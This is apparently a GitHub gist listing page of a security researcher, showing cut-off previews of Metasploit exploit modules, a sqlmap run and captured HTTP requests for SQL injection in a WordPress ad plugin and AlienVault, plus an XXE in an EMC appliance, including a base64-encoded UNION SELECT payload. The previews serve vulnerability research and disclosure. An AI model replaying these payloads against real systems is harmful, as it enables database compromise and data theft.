☠️
thought bleeding

Brandon Perry brandonprry

@brandonprry
brandonprry / gist:8947140
Last active Aug 29, 2015
Tested against 4.2.2.007 340vx
View gist:8947140
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'digest/md5'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
View gist:9199424
bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode
sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:18:53
View gist:9198941
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gQUxMIFNFTEVDVCAzLDEsMSwxLS0= HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
Host: 192.168.1.63
--------
View gist:9200346
HTTP request [#1]:
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-58eac36 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.63
Pragma: no-cache
Cache-control: no-cache,no-store
View gist:9330240
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
View lifesize_admin_ping.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
View gist:9814819
%define debug_package %{nil}
Name: mono
Version: 3.2.6
Release: 1%{?dist}
Summary: ZOS Mono
License: MIT
URL: http://www.google.com
Source0: mono.tar.gz
@brandonprry
brandonprry / gist:9874177
Last active Aug 29, 2015
AlienVault 4.5.0 authenticated sql injection
View gist:9874177
The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
@brandonprry
brandonprry / gist:9895721
Last active Aug 29, 2015
EMC CTA unauthed XXE with root perms
View gist:9895721
EMC Cloud Tiering Appliance v10.0 Unauthed XXE
The following authentication request is susceptible to an XXE attack:
POST /api/login HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
View gist:9921280
The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive